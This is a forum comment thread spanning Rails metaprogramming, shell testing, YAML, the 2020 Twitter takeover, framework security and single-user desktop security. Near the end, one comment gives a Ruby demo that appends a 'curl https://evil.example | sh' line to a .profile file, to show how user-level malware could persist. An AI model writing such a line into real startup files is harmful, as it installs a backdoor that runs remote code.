1. 2

    For $HOME, my new shed/workshop/what-have-you is about to be built… right where the fibre comes into the house, and right where a (currently unused) ethernet conduit traverses the exterior wall… so I guess I’ll be moving them slightly, so as to avoid damage/issues.

    For $WORK I need to do some research on a piece of software a potential client is already using, to estimate some work that integrates with it.

    1. 7

      Having worked on a lot of Rails codebases and teams, big and small, I think this article is pretty spot on. Once your codebase or team is big enough that you find yourself getting surprised by things like

      counters = %i(one two three four five)
      counters.each do |counter|
        define_method("do_#{counter}_things") do |*args|
          # whatever horrible things happen here
        end
      end

      etc… you’ve outgrown rails.

      1. 7

        This is my litmus test for “has this person had to maintain code they wrote years ago”.

        I don’t think I’ve yet worked with anyone who can answer yes but also wants me to maintain code that can’t be found via grep.
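
        For what it’s worth, a sketch of the greppable rewrite of that kind of snippet (the method and helper names here are hypothetical stand-ins, not from any real codebase):

        ```ruby
        # Static definitions: `grep -rn "def do_three_things"` actually finds
        # this, unlike names assembled at runtime via define_method.
        class Counters
          def do_one_things(*args)
            handle(:one, args)
          end

          def do_two_things(*args)
            handle(:two, args)
          end

          def do_three_things(*args)
            handle(:three, args)
          end

          private

          # Hypothetical shared helper standing in for "whatever horrible
          # things happen here".
          def handle(counter, args)
            [counter, args]
          end
        end
        ```

        More lines, sure, but every definition shows up in a search.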

        1. 3

          What unholy beast is that. I mean. Seriously. Wtf is that?

          1. 4

            It’s gruesome, and I’ve seen a version of it (using define_method in a loop interpolating symbols into strings for completely ungreppable results) in at least 3 different large old codebases, where “large” is “50KLOC+” and “old” is “5+ years production”

            There are a lot of ways to write unmaintainable code in a lot of languages/frameworks, but if I ever were to take a Rails job again, I would specifically ask to grep the codebase for define_method and look for this prior to taking the job. It’s such a smell.

            1. 2

              I don’t understand why it’s so normalized in Rails to define methods on the fly. You could do that monstrosity easily in most interpreted languages, but there’s a reason people don’t! In Rails, it’s just normal.

              1. 4

                It’s been a long time since I’ve read the ActiveRecord source so it may no longer be this way, but there was a lot of this style of metaprogramming in the early versions (Rails 1.x and 2.x) of the Rails source, ActiveRecord in particular, and I think it influenced a lot of the early adopters and sort of became idiomatic.

          2. 1

            Who the fuck writes code like this?


            1. 1

              The time between “just discovered ruby lets you do that” and “just realized why I shouldn’t” varies from person to person; I’ve seen it last anywhere between a week and a year.

          1. 1

            This is a bit simplistic for my tastes, but thumbs up for another tool that helps people write maintainable shell.

            In case anyone wonders: I use shunit2 for testing stuff I write in shell.

            1. 1

              I am perplexed as to the point of this. What is the value in it? Why would I want to use it? The post explains none of these things.

              1. 0

                The point is to run tests on shell scripts, so that as code changes over time, the output/result of that code is what’s expected/required.

                The whole concept of unit testing is explained on Wikipedia if you wish to know more: https://en.wikipedia.org/wiki/Unit_testing
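
                To make it concrete, here’s the idea in miniature - run some shell, assert on its output. (Hand-rolled via Ruby here so the example is self-contained; shunit2 wraps this same pattern in test_* functions with nicer reporting. Assumes a POSIX `sh` on the PATH.)

                ```ruby
                # A "unit test" for a shell function: run it, then compare
                # actual output against expected output.
                script = <<~'SH'
                  greet() { printf 'hello %s\n' "$1"; }
                  greet world
                SH

                output = IO.popen(["sh", "-c", script], &:read).chomp
                raise "expected greeting, got #{output.inspect}" unless output == "hello world"
                puts "PASS"
                ```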

                1. 1

                  Then I consider this a very poor attempt at a unit testing library.

                  1. 1

                    Why do you say that?

              1. 2

                I’ve used “built in” security like you describe a couple of times, for web apps that used an LDAP DIT as primary “database”. While it can be a steep learning curve for devs not used to working with LDAP in general (particularly if the ACLs get complex), I really like this setup.

                I’ve found that for all the hooplah the last few years about “no sql” databases, OpenLDAP has most if not all those bases covered - especially for the non-extreme use cases most people need - but with solid, well understood built in support for schemas, indexes, replication, auditing, etc.

                1. 1

                  Upvoted for LDAP. It’s quite a beast to tame, but it does the job immensely well.

                1. 2

                  I’ve been pretty happy with https://github.com/kward/shunit2/, which is explicitly not bash-specific.

                  1. 12

                    To say “YAML has its oddities” is like saying “the ocean is somewhat damp”.

                    I can only assume that every adoption of YAML has been by people who heard about it being used, but had never actually used it in any depth themselves. To believe otherwise is to believe that those people willingly opted in to the ridiculous semantics, syntax and parsers that surround YAML.
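
                    A few of the classics, for anyone who hasn’t been bitten yet (exact behaviour varies by parser and by YAML 1.1 vs 1.2):

                    ```yaml
                    countries: [DE, FR, NO]  # NO is boolean false under YAML 1.1 rules
                    version: 3.10            # a float: silently becomes 3.1
                    ports: 22:22             # sexagesimal! parses as the integer 1342
                    on: push                 # the bare key itself can resolve to boolean true
                    ```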

                    1. 3

                      Agreed. I’d rather use XML than YAML.

                      1. 3

                        I’m not sure.

                        I certainly miss the ability to check whether a document is both syntactically valid and semantically conformant to a schema.

                        But OTOH yaml is so quick and easy to write and read… I think it’s good that it’s being used in stuff like ansible/kubernetes.

                        1. 5

                          But OTOH yaml is so quick and easy to write and read…

                          I don’t think this is true – how can something be “quick and easy to write and read” when even the YAML parsers themselves disagree with each other on what’s valid YAML?

                          I think it’s good that it’s being used in stuff like ansible/kubernetes.

                          It certainly fits the quality standards of Go software. :-)

                          1. 4

                            I don’t think this is true – how can something be “quick and easy to write and read” when even the YAML parsers themselves disagree with each other on what’s valid YAML?

                            Because the problematic bits are <1% of the spec and everyone mostly uses the other 99%.

                            1. 2

                              Just imagine how people would absolutely lose their mind if the same was true about XML.

                              1. 2

                                I’m not saying that 1% isn’t a problem. But I think the syntax conveniences of YAML over XML explain its popularity despite the spec issue.

                            2. -1

                              Regarding go software and kubernetes in particular… Can you name a comparably feature rich and production ready open source alternative?

                              I agree that kubernetes introduces its own complexity and everything… Yet it’s probably one of the best alternatives we have right now.

                              1. 3

                                I think the alternative is not using Kubernetes (and perhaps seriously reflecting on all the wrong life choices made that resulted in thinking one needs Kubernetes in the first place).

                                1. -2

                                  In other words: you can’t. Case closed.

                            3. 1

                              The use of significant white space instantly discounts any “easy to write” claim as bullshit.

                        1. 24

                          That headline is pretty confusing. It seems more likely that Twitter itself was compromised than that tons of individual users (billionaires, ex-leaders, etc.) were?

                          1. 18

                            You’re right. This is a case of Verge reporting what they’re seeing, but the scope has grown greatly since the initial posts. There have since been similar posts to several dozen prominent accounts, and Gemini replied that it has 2FA.

                            Given the scope, this likely isn’t accounts being hacked. I suspect that either the platform or an elevated-rights Twitter content admin has been compromised.

                            1. 12

                              Twitter released a new API today (or was about to release it? Not entirely clear to me what the exact timeline is here), my money is on that being related.

                              A ~$110k scam is a comparatively mild result considering the potential for such an attack, assuming there isn’t some 4D chess game going on as some are suggesting on HN (personally, I doubt there is). I don’t think it would be an exaggeration to say that in the hands of the wrong people, this could have the potential to tip election results or even get people killed (e.g. by encouraging the “Boogaloo” people and/or exploiting the unrest relating to racial tensions in the US from some strategic accounts or whatnot).

                              As an aside, I wonder if this will contribute to the “mainstreaming” of digital signing to verify the authenticity of what someone said.

                              1. 13

                                or even get people killed

                                If the Donald Trump account had tweeted that an attack on China was imminent there could’ve been nuclear war.

                                Sounds far-fetched, but this very nearly happened with Russia during the cold war when Reagan joked “My fellow Americans, I’m pleased to tell you today that I’ve signed legislation that will outlaw Russia forever. We begin bombing in five minutes.” into a microphone he didn’t realize was live.

                                1. 10

                                  Wikipedia article about the incident: https://en.wikipedia.org/wiki/We_begin_bombing_in_five_minutes

                                  I don’t think things would have escalated to a nuclear war that quickly; there are some tensions between the US and China right now, but they don’t run that high, and a nuclear war is very much not in China’s (or anyone’s) interest. I wouldn’t care to run an experiment on this though 😬

                                  Even in the Reagan incident things didn’t seem to have escalated quite that badly (at least, in my reading of that Wikipedia article).

                                  1. 3

                                    Haha. Great tidbit of history here. Reminded me of this 80’s gem.

                                    1. 2

                                      You’re right - it would probably have gone nowhere.

                                  2. 6

                                    I wonder if this will contribute to the “mainstreaming” of digital signing to verify the authenticity of what someone said

                                    It’d be nice to think so.

                                    It would be somewhat humorous if an attack on the internet’s drive-by insult site led to such a thing, rather than the last two decades of phishing attacks targeting financial institutions and the like.

                                    1. 3

                                      I wonder if this will contribute to the “mainstreaming” of digital signing to verify the authenticity of what someone said.

                                      A built-in system in the browser could create a 2FA system while being transparent to the users.

                                      1. 5

                                        2fa wouldn’t help here - the tweets were posted via user impersonation functionality, not direct account attacks.

                                        1. 0

                                          If you get access to twitter, or the twitter account, you still won’t have access to the person’s private key, so your tweet is not signed.
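
                                          The mechanics of that, sketched with Ruby’s stdlib OpenSSL bindings (RSA chosen purely for illustration; a real deployment would also need key distribution, rotation, revocation, etc.):

                                          ```ruby
                                          require "openssl"

                                          # The private key never leaves the user's device, so a compromised
                                          # platform can post text but can't produce a valid signature for it.
                                          key   = OpenSSL::PKey::RSA.new(2048)
                                          tweet = "Send me 1 BTC and I'll send back 2!"
                                          sig   = key.sign(OpenSSL::Digest.new("SHA256"), tweet)

                                          # Anyone holding the published public key can check authenticity:
                                          puts key.public_key.verify(OpenSSL::Digest.new("SHA256"), sig, tweet)     # true
                                          puts key.public_key.verify(OpenSSL::Digest.new("SHA256"), sig, "forged")  # false
                                          ```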

                                          1. 9

                                            Right, which is the basic concept of signed messages… and unrelated to 2 Factor Authentication.

                                            1. 2

                                              2FA, as I used it, means authenticating the message via two factors: the first being access to the Twitter account, and the second being a cryptographic signature on the message.

                                              1. 3

                                                Twitter won’t even implement the editing of published tweets. Assuming they’d add something that implicitly calls into question their competence in stewarding people’s tweets is a big ask.

                                                1. 2

                                                  I’m not asking.

                                      2. 2

                                        A ~$110k scam

                                        The attacker could just be sending coins to himself. I really doubt that anyone falls for a scam where someone you don’t know says “give me some cash and I’ll give you double back”.

                                        1. 15

                                          I admire the confidence you have in your fellow human beings but I am somewhat surprised the scam only made so little money.

                                          I mean, there’s talk about Twitter insiders being paid for this so I would not be surprised if the scammers actually lost money on this.

                                          1. 10

                                            Unfortunately people do. I’m pretty sure I must have mentioned this before a few months ago, but a few years ago a scammer managed to convince a notary to transfer almost €900k from his escrow account by impersonating the Dutch prime minister with a @gmail.com address and some outlandish story about secret agents, code-breaking savants, and national security (there’s no good write-up of the entire story in English AFAIK, I’ve been meaning to do one for ages).

                                            Why do you think people still try to send “I am a prince in Nigeria” scam emails? If you check your spam folder you’ll see that’s literally what they’re still sending (also many other backstories, but I got 2 literal Nigerian ones: one from yesterday and one from the day before that). People fall for it, even though the “Nigerian Prince” is almost synonymous with “scam”.

                                            Also, the 30 minute/1 hour time pressure is a good trick to make sure people don’t think too carefully and have to make a snap judgement.

                                            As a side-note, Elon Musk doing this is almost believable. A friend sent me just an image of it overnight, and when I woke up to it this morning I genuinely wondered whether it was true. Jeff Bezos? Well….

                                            1. 12

                                              People fall for it, even though the “Nigerian Prince” is almost synonymous with “scam”.

                                              I’ve posted this research before but it’s too good to not post again.

                                              Advance-fee scams are high touch operations. You typically talk with your victims over phone and email to build up trust as your monetary demands escalate. So anyone who realizes it’s a scam before they send money is a financial loss for the scammer. But the initial email is free.

                                              So instead of more logical claims, like “I’m an inside trader who has a small sum of money to launder” you go with a stupidly bold claim that anyone with a tiny bit of common sense, experience, or even the ability to google would reject: foreign prince, huge sums of money, laughable claims. Because you are selecting for the most gullible people with the least amount of work.

                                        2. 5

                                          My understanding is that Twitter has a tool to tweet as any user, and that tool was compromised.

                                          Why this tool exists, I have no idea. I can’t think of any circumstance where an employee should have access to such a tool.

                                          Twitter has been very tight-lipped about this incident and that’s not a good look for them. (I could go on for paragraphs about all of the fscked up things they’ve done)

                                          1. 5

                                            or an elevated-rights Twitter content admin

                                            I don’t think content admins should be able to make posts on other people’s accounts. They should only be able to delete or hide stuff. There’s no reason they should be able to post for others, and the potential for abuse is far too high for no gain.

                                            1. 6

                                              Apparently some privileges allow internal Twitter employees to remove MFA and reset passwords. Not sure how it played out, but I assume MFA had to be disabled in some way.

                                            1. 5

                                              That’s a good article! Vice has updated that headline since you posted to report that the listed accounts got hijacked, which is more accurate. Hacking an individual implies that the breach was in their control: phone, email, etc. This is a twitter operations failure which resulted in existing accounts being given to another party.

                                          1. 1

                                            Say what you want about Oracle’s stewardship of MySQL, at least they’re not actively adding mysql-only syntax for new features that are already defined in the SQL standard, and are in fact deprecating/removing non-standard syntax.

                                            1. 1

                                              The last time I had to work on a large shell project, I started out doing something similar to this, but found it a little limited, so I wrote this. This is more focused on projects big enough to have a wiki, and libraries or shell functions. The approach presented in the article works great for small standalone scripts.

                                              1. 2

                                                Yep - I took a pretty similar approach, for pretty similar reasons. The biggest difference is that I targeted markdown rather than RST, and I wrote mine in shell.

                                              1. 13

                                                Managed services == cloud, which leads to vendor lock-in, which leads to centralization of the internet.

                                                Hard pass.

                                                Own your infrastructure, own your data. If you care about your business you’ll do this. If you are cash strapped and can’t find or afford the talent, that’s a whole different cup of otters.

                                                1. 3

                                                  If you use something like managed PostgreSQL then I assume you’ll always have the option to dump your data and import it somewhere else, right?

                                                  1. 3

                                                    Yes, with downtime unless they also offer replication access (RDS does not).

                                                    1. 2

                                                      Context: I contract to (mostly) small companies providing ops/tooling and dev services.

                                                      TLDR: If you don’t want to have to hire in-house ops people to manage your DB layer, I’d very much recommend a company (e.g. Percona or similar) to manage it for you, on infra you control.

                                                      Long rant-y version:

                                                      This is (one of) the key points that surprise clients when I talk to them about a multi-vendor solution.

                                                      They mostly understand fairly well the risk of relying on a single company, especially with how rube-goldbergy AWS is.

                                                      “Ok so we’ll just use <cloud 1> and <cloud 2>, right?”

                                                      I’ve literally never seen any first party managed DB service (i.e. where the management isn’t provided by some third party, e.g. Percona) that will even acknowledge the existence of a managed instance provided by another company. And with the direction that AWS in particular goes, you’d be crazy to try it: replicating to/from their “patched” / “reimplemented” versions and a regular instance elsewhere? Sounds like you’re just begging for incompatibilities there.

                                                      At the very most, I’d vaguely agree (with the overall discussion, WRT databases) that some businesses might benefit from having a third party manage their DB setup, across multiple vendors (i.e. just using the vendors to provide virtual machine instances of some form) that the business itself controls (i.e. you give DBs-R-Us access to your DB infra, not pay them to provide you with a hosted DB service). In this scenario the big “cloud” operators are likely worse options, as they’re very much keyed around using as much of their “as a service” stack as possible, and just renting dumb VMs from them 24x7 is ridiculously expensive compared to the competition.

                                                1. 3

                                                  I’m still at a loss for a good distributed log analyser.

                                                  GoAccess has most of what I/we want, but it’s got no support for storing the accumulated metrics in e.g. Redis, or SQL, or what have you, and thus it’s not really fantastic for anything with > 1 web server.

                                                  So far I’m still tossing up if I should just write one myself.

                                                  1. 1

                                                    Why not try submitting a patch upstream? I’m sure other GoAccess users have similar needs.

                                                    1. 3

                                                      GoAccess is written in C, which is most definitely not in my wheelhouse. Ok, so, why not just learn some more?

                                                      The previous time I put in the effort to make a patch against a C codebase (not that C is the specific problem, but it meant a significant effort due to my inexperience, compared to either a language I am familiar with, or a person familiar with C) was also “scratching my own itch”: I submitted the PR 1 year and 19 days ago. So far, the ‘owner’ of the project hasn’t responded to the PR at all.

                                                      Previous PRs haven’t all necessarily been completely ignored like that, but I’ve had more multi-month+ delays in getting any kind of feedback/activity, than I have “positive” engagements.

                                                      I guess what I’m saying is: the effort involved for me is going to be quite high, and having to maintain a fork of a tool written in C (if there’s zero upstream action/interest) isn’t really on my “hey this sounds like it’d be fun” list.

                                                      Edit: and I should add - I’m not “negative” on Open Source. The stuff I write for my company is specifically all OSS, and I have obviously had some reasonably good experiences with upstream projects. But the often bandied “if projects aren’t on GitHub they won’t get contributors because it’s harder to find/no network effect” line, to me, misses a significant aspect. This isn’t PR field of dreams, where “if you PR, they will merge it”. Just because someone submits a PR doesn’t mean there’s any specific likelihood it’ll ever be looked at.

                                                      1. 1

                                                        I’ve had similar experiences. One of my own PRs took a year and a half to get accepted, and I was just updating documentation!

                                                        I didn’t mean to suggest that you should rush into writing code. Open an issue outlining the problem first to gauge interest. Make sure you note your willingness to contribute code, but don’t write a line until one of the maintainers makes it clear that they’re on board. Of course, if you really don’t want to take the time, then don’t! It’s your life; live it the way you want to!

                                                  1. 1

                                                    I guess it’s fitting that an editor written in a web browser can then show stuff from the web. Not really sure either of those is a good thing though.

                                                    1. 4

                                                      4k monitor only makes sense with 2× / 200% scaling

                                                      Yep. Can’t stress enough what a bad idea non-integer scaling is.

                                                      1. 2

                                                        This is subjective. I use a 27” 4K display at 1.5 and it’s fine. I can’t see pixels from the distance I’m standing away so it looks sharp to me.

                                                        1. 1

                                                          Similarly, I can’t stress enough what a bad idea it is to assume everyone else’s priorities are the same as yours.

                                                        1. 5

                                                          I agree that a Hi-DPI display is a good investment, even “just for text”. I spend 80% of my (working) time in either an IDE, a Terminal or an SQL client. Even when I’m using a browser it’s mostly to read (or write) text.

                                                          But I have to disagree with the “integer scaling” point re: macOS, particularly given that the article is about “upgrade your monitor”, which implies buying something. If you take a screenshot of a UI element or some rendered text and scale them up, yes, you will see that picking non-integer scaled UI in macOS will give you non “crisp” lines. That he can’t show an example at the scale they actually appear (the way he does with the font-smoothing on/off screenshot) is telling. It also ignores the reality of the market.

                                                          Most traditional “low DPI” displays are around 100 to 110 DPI. All of Apple’s “Retina” displays are right around 220 DPI. For a 15 or 16” MBP with a DPI of 220, picking the exact “@2x” resolution (i.e. half the vertical and horizontal res of the physical panel) is (a) not much of a change from the default, and will look very readable (and reduce a little GPU strain as well).
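
                                                          The arithmetic behind those figures, as a quick sanity check (sizes and resolutions are the commonly quoted ones):

                                                          ```ruby
                                                          # DPI = diagonal pixels / diagonal inches.
                                                          def dpi(w_px, h_px, inches)
                                                            (Math.sqrt(w_px**2 + h_px**2) / inches).round(1)
                                                          end

                                                          puts dpi(1920, 1080, 24)  # classic 24" 1080p: ~92 DPI
                                                          puts dpi(3840, 2160, 27)  # 27" 4K:  ~163 DPI
                                                          puts dpi(5120, 2880, 27)  # 27" 5K:  ~218 DPI (LG UltraFine)
                                                          puts dpi(3072, 1920, 16)  # 16" MBP: ~226 DPI
                                                          ```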

                                                          But let’s be honest, very few people are working on just a laptop screen by choice. If you write software there’s a better than average chance you are, or could be, more productive with more screen real estate. If you want to dispute this, then you may as well just stop reading and start abusing me for making assumptions because the rest isn’t gonna make you any less angry.

                                                          Ok, so you want an external display, and you want to use Hi-DPI mode so the fonts are all crisp and nice to look at. Great. If your vision is decent, and you want to follow the author’s “recommendation” about scaling, I’d argue that you have realistically just two choices for displays: the 27” 5K LG UltraFine, or the 32” 6K Apple Pro Display. There’s also some weird brand that has the same size/res as the 5K LG, but my understanding is that most people who buy one end up going through several returns until they just have to settle for the least bad unit.

                                                          But wait, you say. There are dozens and dozens of 4K displays on the market! Heaps of people have 4K 27” displays, and macOS detects them as Hi-DPI. Yes, it does. But this is where that integer scaling thing comes in. If you run a 4K display at its “integer scaled @2x” resolution, it presents an image that “looks like” 1920x1080.

                                                          Have you seen 1920x1080 on a 27” display? I haven’t. I’ve seen it on 24” displays, where it’s just about liveable if you’re really obsessed with integer scaling. On a 27” I’d imagine it looks like you’re reading a “my first numbers” book for toddlers.

                                                          Sitting at arm’s length (literally, if I reach out I can not quite touch the displays in front of me), I use two 24” 4K displays. And I use them at the dastardly “non integer” scaled UI of “Looks like 2304x1296”. If I put one back to integer scaling so it “looks like” 1920x1080, I can of course see a difference. But probably not the difference the author is suggesting. The difference I see is that on the one using integer scaling, everything looks weirdly over-sized. I would need to either press my face to the screen or screenshot and scale it up a heap to see any small imperfect pixel placements.

                                                          IMO this is the biggest benefit of a high-enough DPI. You aren’t fixed to a single resolution matched to the hardware, beyond which things look like absolute shit (ever tried running a ~110 DPI display at a non-native resolution - e.g. for someone with poorer eyesight? “I don’t care if it’s blocky, at least I can read it” was the common response to our (support team’s) shock at this phenomenon, circa 2004).

                                                          Obviously the larger the display gets without increasing resolution, the lower your DPI and the more obvious the negative effects of both modes: as the physical size increases, in “integer scaling mode” you go from “my first numbers” text to standing on the writing on a football field and trying to read the text you’re standing on. In non-integer scaling mode, the “blurriness” of the rendered pixels will increase. I can’t comment on how visually noticeable this is, because while I accept non-integer scaling as my lord and saviour, I still aimed for the highest DPI (aka lowest physical size compared to resolution) I could find.

                                                          1. 1

                                                            That you can’t show an example at the scale they actually appear (the way he does with the font-smoothing on/off screenshot) is telling.

                                                            Let’s imagine that the reader browses the page on a Mac with non-integer scaling. What’s the screenshot going to look like?

                                                            1. 2

                                                              My point is that he felt the need to scale the image to 800% (yes, really) to show a difference.

                                                              If you’re on a Mac, open up his image in Preview, and compare it to the Finder toolbar. You need to scale his down to 12.5% to get it to appear the same as the actual toolbar controls. Now look at the content of his image. Apart from one being slightly smaller (due to his process to “simulate” a non-integer screenshot, no doubt), there is no way you can tell me you would notice the difference between the two.

                                                              Unless you’re designing UIs where you need to see literally one exact pixel, the argument that no one should ever use non-integer scaling is just blind (no pun intended) to (a) how eyes work, (b) why people use high-DPI displays and (c) the market of available products.

                                                          1. 10

                                                            Every Ruby on Rails app was found vulnerable in 2013, and the Equifax data breach was due to an outdated version of Apache Struts. Not trying to hate on these frameworks specifically here – I like Rails – but they’re high-profile examples that show that frameworks are not always sunshine either.

                                                            Lobsters for example is written in Rails, but it uses a small fraction of Rails’ features. I don’t think it would really be any less secure if it had been written “from scratch” by someone who knew what they were doing, especially not if they used existing libraries like Rack and whatnot. (there are of course many other advantages to using Rails, and I think Rails is a pretty good fit for something like Lobsters. but not because it’s more secure).

                                                            Years ago (my first programming job) there was some push to replace a very simple CRUD CMS with Joomla. I pushed back against this as the code was pretty simple (not much that could go wrong) and I also knew that after I left no-one else would be there to maintain or update it, increasing the risk of automated scanners trying to find vulnerable Joomla versions etc. I think this is a good example where using a framework would not be a good idea.

                                                            So … it all depends on what you’re doing. I think The Real Lesson™ here should be to throw as much funky input towards your code as possible, especially security-critical code. I think a fuzzer would probably have caught this error.
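
                                                            A minimal sketch of that kind of fuzzing in Ruby (`parse_amount` is a hypothetical stand-in for whatever security-critical parsing you have; the point is just hammering it with random bytes and asserting it never raises):

```ruby
# Hypothetical security-critical parser: returns an Integer for all-digit
# input, nil for everything else, and should never raise.
def parse_amount(input)
  s = input.to_s.dup.force_encoding(Encoding::BINARY)
  /\A\d+\z/.match?(s) ? Integer(s, 10) : nil
end

rng = Random.new(1234) # fixed seed so any failure is reproducible
1_000.times do
  input = rng.bytes(rng.rand(0..32))
  begin
    parse_amount(input)
  rescue => e
    abort "fuzzer found a crash for #{input.inspect}: #{e.class}: #{e}"
  end
end
puts "survived 1000 random inputs"
```

                                                            Even a dumb loop like this catches a surprising number of encoding and nil bugs; a coverage-guided tool catches more, but the habit is what matters.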

                                                            I don’t know what kind of websites those “200 websites” are, if they’re simple “deploy and forget” stuff then a simple custom framework with very little moving parts might be a good idea. If they’re complex sites then a standard framework would probably be better (even in “deploy and forget” scenarios). Either way, like most “which should I use” questions the answer is “it depends” :-)

                                                            1. 4

                                                              Not trying to hate on these frameworks specifically here – I like Rails – but they’re high-profile examples that show that frameworks are not always sunshine either.

                                                              I believe the killer argument is “not my fault”. When you use something backed by a big community, you won’t be held accountable for its bugs, even if they cost significant money. If you wrote that bug however, that’s another matter. Especially if you had the option of using that popular thingy instead.

                                                              1. 2

                                                                Often, “not my fault” turns into “not a simple fix” though

                                                                1. 5

                                                                  Definitely. That’s one reason why I personally like to minimise dependencies: code I wrote is code I can fix.

                                                                  1. 3

                                                                    This is a sadly uncommon view in 2020, I feel.

                                                            1. 3

                                                              TLDR: Using a framework means giving up a lot of control, which becomes particularly problematic when you are dealing with a discovered bug.

                                                              Long, rant-y version:

                                                              … The counterpoint to this whole framework “herd immunity” concept is twofold:

                                                              (a) Once the herd is big enough, you’re guaranteed to be a target for automated attacks. Anyone who’s ever looked at a web server log has seen hundreds if not thousands of 404s for calls to endpoints that don’t exist on that server, but do exist under (typically PHP) ‘frameworks’ like WordPress and the like. As has been mentioned by others, someone discovered a serious bug in Rails several years back, and just like that every Rails app in the world was vulnerable to an easily exploitable bug. Security through obscurity isn’t great security, but there is a reason “hide your valuables” is still sound advice in a car park.

                                                              (b) If you control (or arguably, understand well enough to be comfortable patching) the library/framework, you can fix a bug as soon as you know it exists. Just because a community exists doesn’t mean that a fix is going to be timely or adopted instantly, particularly if you’re at multiple levels of dependency.

                                                              To illustrate point (b), last year I came across a weird bug where some actions in a third-party Ruby web app weren’t working. After a lot of faffing about, it turned out to be a bug introduced in a patch version (2.0.5) of Sinatra, that just broke shit on versions of Ruby before 2.4.

                                                              I don’t pretend to be a Ruby expert (I can mostly read it, I tend not to write it), but even I’d heard of the Sinatra framework before this bug, so let’s just say it’s reasonably popular in the Ruby world. The timeline around the bug I encountered was thus:

                                                              • 2018-12-23: Sinatra 2.0.5 is released
                                                              • 2019-01-11: Issue describing the SNAFU on Ruby < 2.4 is filed
                                                              • 2019-02-07: Issue is closed via PR
                                                              • … crickets …
                                                              • 2019-08-21: Sinatra 2.0.6 is released with the fix

                                                              I’m just going to ignore that the fix was to literally add 5 characters plus two spaces (literally val && ), and that the time from issue opened to PR opened was roughly the same as the time then spent discussing the PR and whether the PR author was correct in having followed the project’s own contributing guide and updated the changelog file. All of that is IMO ridiculous, but inconsequential in the grand scheme of things.
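
                                                              For what it’s worth, the shape of that five-character fix is just Ruby’s classic nil guard, sketched here with made-up names (this is an illustration of the pattern, not the actual Sinatra code):

```ruby
# Before: blows up with NoMethodError when val is nil.
def negotiate(val)
  val.downcase
end

# After: `val && ` makes nil fall through instead of crashing.
def negotiate_fixed(val)
  val && val.downcase
end

p negotiate_fixed(nil)    # => nil
p negotiate_fixed("Gzip") # => "gzip"
```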

                                                              If you release a patch version that fucks shit up, and your “release schedule” is every 6 months, you either need to make sure your shit is fucking solid, or throw your fucking release schedule out the fucking window.

                                                              The current fad with “re-use all the things, don’t ever write anything that anyone might have written before” is beyond stupid. Given the sort of shit we’ve seen from this practice in the NodeJS community, I would fully expect these people to insist that they don’t need a lawyer to write a contract for a business, they have this perfectly good one their niece wrote in fucking crayon. It says “contract” on the top (although the R is reversed of course) so it must be of equal quality.

                                                              1. 1

                                                                If you release a patch version that fucks shit up, and your “release schedule” is every 6 months, you either need to make sure your shit is fucking solid, or throw your fucking release schedule out the fucking window.

                                                                It might be a good idea to bank a portion of the money saved on license and support fees to be able to pay an experienced Ruby consultant to fix stuff if needed.

                                                                1. 1

                                                                  … Unless the “Ruby consultants” you know have some magical ability to force third-party projects to make more frequent releases when bug fixes are merged, what exactly are you suggesting they could do?

                                                                  We knew the problem. Short term, we applied a patch to the Ruby file in question; longer term, we switched to installing a newer version of Ruby from a third-party apt repo.
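
                                                                  Since Ruby classes and modules are open, that kind of short-term patch can be as simple as reopening the offending code after the gem is loaded. A sketch with invented names (BuggyGem and best_match are hypothetical, not the real Sinatra internals):

```ruby
# Pretend this is the buggy method as shipped by the gem.
module BuggyGem
  def self.best_match(val)
    val.split(";").first # crashes when val is nil
  end
end

# Our local patch file, required after the gem: reopen the module and
# replace the method with a nil-safe version.
module BuggyGem
  def self.best_match(val)
    val && val.split(";").first
  end
end

p BuggyGem.best_match(nil)               # => nil
p BuggyGem.best_match("text/html;q=0.9") # => "text/html"
```

                                                                  Ugly, but it unblocks you immediately and is trivial to delete once upstream ships the fix.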

                                                                  1. 1

                                                                    Thanks for clarifying, it seemed at first read that you didn’t get this resolved until Sinatra was updated.

                                                                    Open source saves the day again!

                                                              1. 8

                                                                I recently moved from cold northern Europe to Thailand, and while I was a big dark-theme advocate and used dark themes everywhere, I did a complete 180° here. It’s just so bright here, and it’s so nice to work in brighter environments. I’m even waking up at 6am to enjoy working outside on the balcony. Even that early in the morning, and with modern screens, it’s still very hard to clearly see and read with a dark theme. Clearly a light theme is the way to go here in Thailand.

                                                                What I’m getting at with my anecdote is that this seems to be an issue of environments. I think all of the pros/cons can flip right over when the screen is moved somewhere else. Even with my love of the light Solarized theme, I’d probably switch right back to a dark theme if I had to move back to a cold, northern-European winter.

                                                                1. 4

                                                                  Clearly a light theme is the way to go here in Thailand.

                                                                  Conversely, due to the heat (edit:) and humidity it’s entirely possible someone in Thailand will work inside with less natural light.

                                                                  Geographic location likely has very little impact on whether a light or dark background produces less eye strain. The work area level environment has a lot of impact on it. You could be working in a cloudy city and I’d imagine that working from a balcony would still be too bright for dark mode to be “better”.

                                                                  1. 3

                                                                    What I’m getting to with my anecdote is that this seems be an issue of environments.

                                                                    This seems to be my experience as well. In winter months, I’m perfectly happy with dark themes but in the summer, especially in the morning, or when I’m working from coffee shops I just need the light mode. One other thing that seems to be a factor here is what I’m working on: for example if I have dark theme in the editor and the terminal, but no way of changing it in other windows that I also need to use (like in the browser or PDF reader) then it’s awkward to switch from dark to light and I just prefer to use light mode everywhere.

                                                                  1. 57

                                                                    Honestly, for the vast majority of users, the security domain model of modern *nix desktops is incorrect.

                                                                    The vast majority of machines only ever have one user on them. If something running as that user is compromised, that’s it. Even if there were no privilege escalation, so what? You can’t install device drivers…but you can get the user’s email, overwrite their .profile file, grab their password manager’s data, etc, etc.
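
                                                                    To make that concrete: anything running as the user can quietly persist itself with nothing but ordinary file access. A sketch (the backdoor_profile helper is made up, the payload is obviously fake, and it’s pointed at a temp directory rather than a real home):

```ruby
require "tmpdir"

# Append a line to the user's shell startup file. No root, no exploit,
# no permission prompt -- just normal file access as that user.
def backdoor_profile(home)
  profile = File.join(home, ".profile")
  File.open(profile, "a") { |f| f.puts "curl https://evil.example | sh # fake payload" }
  File.read(profile)
end

Dir.mktmpdir do |fake_home| # stand-in for Dir.home
  puts backdoor_profile(fake_home)
end
```

                                                                    Nothing in the classic *nix permission model even notices this, because the model only guards users from each other.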

                                                                    I think that if I were designing a desktop operating system today, I would do something along the lines of VM/CMS…a simple single-user operating system running under virtualization. The hypervisor handles segregating multiple users (if any), and the “simple” operating system handles everything else.

                                                                    (I know Qubes does something like this, but its mechanism is different from what I’m describing here.)

                                                                    In that hypothetical simple single-user operating system, every application runs with something akin to OpenBSD’s pledge baked in. Your web browser can only write to files in the Downloads directory, your text editor can’t talk to the network, etc.

